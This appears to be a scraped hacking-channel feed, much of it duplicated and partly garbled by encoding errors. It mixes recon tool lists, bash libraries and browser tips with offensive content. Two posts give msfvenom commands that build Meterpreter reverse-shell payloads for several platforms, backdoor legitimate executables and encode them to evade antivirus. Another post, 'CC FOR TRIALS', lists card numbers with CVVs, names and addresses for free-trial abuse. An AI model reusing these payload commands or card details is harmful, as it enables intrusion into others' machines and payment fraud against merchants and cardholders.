β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Open Source #Threat Intelligence
- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.
- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Open Source #Threat Intelligence
- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.
- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - ciscocsirt/GOSINT: The GOSINT framework is a project used for collecting, processing, and exporting high quality indicatorsβ¦
The GOSINT framework is a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). - ciscocsirt/GOSINT
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ IP address and DNS #Lookup Tools 2020 :
- bgp
- Bgpview
- DataSploit (IP Address Modules)
- Domain Dossier
- Domaintoipconverter
- Googleapps Dig
- Hurricane Electric BGP Toolkit
- ICANN Whois
- Massdns
- Mxtoolbox
- Ultratools ipv6Info
- Viewdns
- Umbrella (OpenDNS) Popularity List
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ IP address and DNS #Lookup Tools 2020 :
- bgp
- Bgpview
- DataSploit (IP Address Modules)
- Domain Dossier
- Domaintoipconverter
- Googleapps Dig
- Hurricane Electric BGP Toolkit
- ICANN Whois
- Massdns
- Mxtoolbox
- Ultratools ipv6Info
- Viewdns
- Umbrella (OpenDNS) Popularity List
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
bgpview.io
BGPView - BGP Toolkit and BGP ASN Routing Lookup Tool
BGPView allows you to debug and investigate information about IP addresses, ASN, IXs, BGP, ISPs, Prefixes and Domain names.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Public Pen Testing Reports recommended :
> The following are several resources that are useful when writing penetration testing reports, including many different examples:
1οΈβ£Curated List of penetration testing reports | https://
github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) |
2οΈβ£ SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 |
3οΈβ£ Offensive Security example |https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf |
4οΈβ£ PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf |
5οΈβ£ Dradis Framework | https://dradisframework.com/ce/ |
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦ Public Pen Testing Reports recommended :
> The following are several resources that are useful when writing penetration testing reports, including many different examples:
1οΈβ£Curated List of penetration testing reports | https://
github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) |
2οΈβ£ SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 |
3οΈβ£ Offensive Security example |https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf |
4οΈβ£ PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf |
5οΈβ£ Dradis Framework | https://dradisframework.com/ce/ |
> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - santosomar/public-pentesting-reports: Curated list of public penetration test reports released by several consultingβ¦
Curated list of public penetration test reports released by several consulting firms and academic security groups - santosomar/public-pentesting-reports
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Creating Binaries with metasploit :
1) -
2) - Creates a simple TCP Payload for Windows
-
3) - Creates a simple HTTP Payload for Windows
-
4) - Creates a simple TCP Shell for Linux
5) -
6) - Creates a simple TCP Shell for Mac
7) -
8) - Creates a simple TCP Payload for Android
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Creating Binaries with metasploit :
1) -
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe 2) - Creates a simple TCP Payload for Windows
-
msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe 3) - Creates a simple HTTP Payload for Windows
-
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf 4) - Creates a simple TCP Shell for Linux
5) -
msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho 6) - Creates a simple TCP Shell for Mac
7) -
msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk 8) - Creates a simple TCP Payload for Android
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Shell Script Development :
- ansi - ANSI escape codes in pure bash
- change text color, position the cursor, much more
- argbash - Bash argument parsing code generator
- assert.sh - Bash unit testing framework
- BashScriptTestingLibrary - A unit testing framework for Bash scripts
- bash3boilerplate - Templates to write better Bash scripts
- bashful - A collection of libraries to simplify writing Bash scripts
- bashmanager - mini bash framework for creating command line tools
- bats - Bash Automated Testing System
- bash_unit - bash unit testing enterprise edition framework for professionals
- mo - Mustache templates in pure bash
- semver_bash - Semantic Versioning in Bash
- shfmt - Format bash programs
- shunit2 - A unit test framework for
Bash scripts with a flavour of JUnit/PyUnit
- bashing - Smashing Bash into Pieces
- Bash framework for creating command line tools
- shellcheck - ShellCheck, a static analysis tool for shell scripts
>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Shell Script Development :
- ansi - ANSI escape codes in pure bash
- change text color, position the cursor, much more
- argbash - Bash argument parsing code generator
- assert.sh - Bash unit testing framework
- BashScriptTestingLibrary - A unit testing framework for Bash scripts
- bash3boilerplate - Templates to write better Bash scripts
- bashful - A collection of libraries to simplify writing Bash scripts
- bashmanager - mini bash framework for creating command line tools
- bats - Bash Automated Testing System
- bash_unit - bash unit testing enterprise edition framework for professionals
- mo - Mustache templates in pure bash
- semver_bash - Semantic Versioning in Bash
- shfmt - Format bash programs
- shunit2 - A unit test framework for
Bash scripts with a flavour of JUnit/PyUnit
- bashing - Smashing Bash into Pieces
- Bash framework for creating command line tools
- shellcheck - ShellCheck, a static analysis tool for shell scripts
>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - fidian/ansi: ANSI escape codes in pure bash - change text color, position the cursor, much more
ANSI escape codes in pure bash - change text color, position the cursor, much more - fidian/ansi
SpotOutlook 1.2.6 - 'Name' Denial of Service (PoC).py
942 B
2020 Verified Cve SpotOutlook Crash 100/100
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Android Security Editing 2020 resources :
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
@UndercodeSecurity
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Android Security Editing 2020 resources :
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
@UndercodeSecurity
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Android Developers
Download Android Studio & App Tools - Android Developers
Android Studio provides app builders with an integrated development environment (IDE) optimized for Android apps. Download Android Studio today.
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Android Security Editing 2020 resources :
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
@UndercodeSecurity
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦#Android Security Editing 2020 resources :
- Android Developer Studio
- APKtool
- dex2jar
- Bytecode Viewer
- IDA Pro
- Android Reverse Engineering Arsenals
@UndercodeSecurity
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Android Developers
Download Android Studio & App Tools - Android Developers
Android Studio provides app builders with an integrated development environment (IDE) optimized for Android apps. Download Android Studio today.
> HACK GMAIL
> JAVASCRIPT TUT
> IMAGES
>ICMP
>AND KERNEL TUTORIALS PDFS π¦
> JAVASCRIPT TUT
> IMAGES
>ICMP
>AND KERNEL TUTORIALS PDFS π¦
Forwarded from UNDERCODE SECURITY
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Create Windows Payload :
> Windows #Payloads
1οΈβ£-
2οΈβ£ - Lists all avalaible encoders
3οΈβ£-
4οΈβ£ - Binds an exe with a Payload (Backdoors an exe)
-
5οΈβ£
6οΈβ£- Creates a simple TCP payload with shikata_ga_nai encoder
7οΈβ£-
8οΈβ£ - Binds an exe with a Payload and encodes it
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦How to Create Windows Payload :
> Windows #Payloads
1οΈβ£-
msfvenom -l encoders 2οΈβ£ - Lists all avalaible encoders
3οΈβ£-
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe 4οΈβ£ - Binds an exe with a Payload (Backdoors an exe)
-
5οΈβ£
msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b Γ’β¬Λ\x00Γ’β¬β’ -i 3 -f exe > example.exe 6οΈβ£- Creates a simple TCP payload with shikata_ga_nai encoder
7οΈβ£-
msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b Γ’β¬Ε\x00Γ’β¬Β -f exe > example.exe8οΈβ£ - Binds an exe with a Payload and encodes it
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Forwarded from UNDERCODE SECURITY
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Passive #Recon s:
#Website Exploration and "Google Hacking" :
* censys - https://censys.io/
* Spyse - https://spyse.com/
* netcraft - https://searchdns.netcraft.com/
* Google Hacking Database (GHDB) - https://www.exploit-db.com/google-hacking-database/
* ExifTool - https://www.sno.phy.queensu.ca/~phil/exiftool/
* Certficate Search - https://crt.sh/
* Huge TLS/SSL certificate DB with advanced search - https://certdb.com/
* Google Transparency Report - https://transparencyreport.google.com/https/certificates
* SiteDigger - http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦Passive #Recon s:
#Website Exploration and "Google Hacking" :
* censys - https://censys.io/
* Spyse - https://spyse.com/
* netcraft - https://searchdns.netcraft.com/
* Google Hacking Database (GHDB) - https://www.exploit-db.com/google-hacking-database/
* ExifTool - https://www.sno.phy.queensu.ca/~phil/exiftool/
* Certficate Search - https://crt.sh/
* Huge TLS/SSL certificate DB with advanced search - https://certdb.com/
* Google Transparency Report - https://transparencyreport.google.com/https/certificates
* SiteDigger - http://www.mcafee.com/us/downloads/free-tools/sitedigger.aspx
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
Censys
Censys | The Authority for Internet Intelligence and Insights
Censys empowers security teams with the most comprehensive, accurate, and up-to-date map of the internet to defend attack surfaces and hunt for threats.
π¦CC FOR TRIALS :
Card Number: 4004442574863553
Exp. Date: 05|2021
CVV: 987
Name: Briney Serris
Address: 20 Chive Drive
Country: Macedonia
Card Number: 4031781367667508
Exp. Date: 11|2025
CVV: 777
Name: Natale Pochin
Address: 0506 Lakeland Hill
Country: United States
Card Number: 4561526282628764
Exp. Date: 04|2025
CVV: 806
Name: Sandye Yakubov
Address: 807 Summer Ridge Point
Country: Croatia
Card Number: 4588627538168784
Exp. Date: 09|2025
CVV: 741
Name: Briney Cainey
Address: 93 Pleasure Junction
Country: Ukraine
Card Number: 4550064331162075
Exp. Date: 11|2025
CVV: 442
Name: Zacharia Pochin
Address: 96308 Hudson Park
Country: United States
Card Number: 4049264010230784
Exp. Date: 05|2023
CVV: 479
Name: Hoyt Todarello
Address: 92 Mcguire Parkway
Country: Sweden
Card Number: 4171961620458628
Exp. Date: 10|2024
CVV: 165
Name: Jacob Bickerton
Address: 0506 Lakeland Hill
Country: United States
Card Number: 4004442574863553
Exp. Date: 05|2021
CVV: 987
Name: Briney Serris
Address: 20 Chive Drive
Country: Macedonia
Card Number: 4031781367667508
Exp. Date: 11|2025
CVV: 777
Name: Natale Pochin
Address: 0506 Lakeland Hill
Country: United States
Card Number: 4561526282628764
Exp. Date: 04|2025
CVV: 806
Name: Sandye Yakubov
Address: 807 Summer Ridge Point
Country: Croatia
Card Number: 4588627538168784
Exp. Date: 09|2025
CVV: 741
Name: Briney Cainey
Address: 93 Pleasure Junction
Country: Ukraine
Card Number: 4550064331162075
Exp. Date: 11|2025
CVV: 442
Name: Zacharia Pochin
Address: 96308 Hudson Park
Country: United States
Card Number: 4049264010230784
Exp. Date: 05|2023
CVV: 479
Name: Hoyt Todarello
Address: 92 Mcguire Parkway
Country: Sweden
Card Number: 4171961620458628
Exp. Date: 10|2024
CVV: 165
Name: Jacob Bickerton
Address: 0506 Lakeland Hill
Country: United States
Forwarded from UNDERCODE SECURITY
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦SPEEDUP FIREFOX BROWSER TIPS :
1οΈβ£Automatically enable hardware acceleration: This item allows Firefox to call your computerβs graphics processor instead of the CPU to display some web content with heavy graphics processing tasks (such as videos, games, etc.).
> This saves computer resources and speeds up the running of other programs (such as the Firefox program itself). This option is selected by default, but it is not applicable to all types of graphics processors. After modifying this setting, you must restart Firefox for it to take effect.
2οΈβ£Content process limitation: In order to enhance security and improve performance, Firefox now enables a multi-process architecture , which is also known as electrolysis ( e10s ). After the architecture is enabled, the web content on the tab page is moved to a separate process other than the main Firefox process, which can improve security and performance.
> Using the multi-content process function can further improve security and minimize the impact of content process crashes. With multi-process enabled, you can modify the limit on the number of content processes.
3οΈβ£Block all images from loading by default.
4οΈβ£Load the mobile version of websites.
5οΈβ£Discard inactive tabs to save memory.
6οΈβ£Clear the browser cache> options>
7οΈβ£Block all images from loading by default.
8οΈβ£install this plugin
https://addons.mozilla.org/en-US/firefox/addon/faster-pageload/
9οΈβ£ Disable Accessibility & tracking Services from preference
πinstall Bookmarklets
https://getpocket.com/add/?ep=1
rewritten by undercode
(sources -firefox support & wiki)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
π¦SPEEDUP FIREFOX BROWSER TIPS :
1οΈβ£Automatically enable hardware acceleration: This item allows Firefox to call your computerβs graphics processor instead of the CPU to display some web content with heavy graphics processing tasks (such as videos, games, etc.).
> This saves computer resources and speeds up the running of other programs (such as the Firefox program itself). This option is selected by default, but it is not applicable to all types of graphics processors. After modifying this setting, you must restart Firefox for it to take effect.
2οΈβ£Content process limitation: In order to enhance security and improve performance, Firefox now enables a multi-process architecture , which is also known as electrolysis ( e10s ). After the architecture is enabled, the web content on the tab page is moved to a separate process other than the main Firefox process, which can improve security and performance.
> Using the multi-content process function can further improve security and minimize the impact of content process crashes. With multi-process enabled, you can modify the limit on the number of content processes.
3οΈβ£Block all images from loading by default.
4οΈβ£Load the mobile version of websites.
5οΈβ£Discard inactive tabs to save memory.
6οΈβ£Clear the browser cache> options>
7οΈβ£Block all images from loading by default.
8οΈβ£install this plugin
https://addons.mozilla.org/en-US/firefox/addon/faster-pageload/
9οΈβ£ Disable Accessibility & tracking Services from preference
πinstall Bookmarklets
https://getpocket.com/add/?ep=1
rewritten by undercode
(sources -firefox support & wiki)
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β ο½ππ»βΊπ«Δπ¬πβ β β β
addons.mozilla.org
Faster Pageload β Get this Extension for π¦ Firefox (en-US)
Download Faster Pageload for Firefox. Load webpages faster by preloading subsequent pages via the instant.page script and lazy loading images. Install the plugin and you will feel how your browser becomes faster.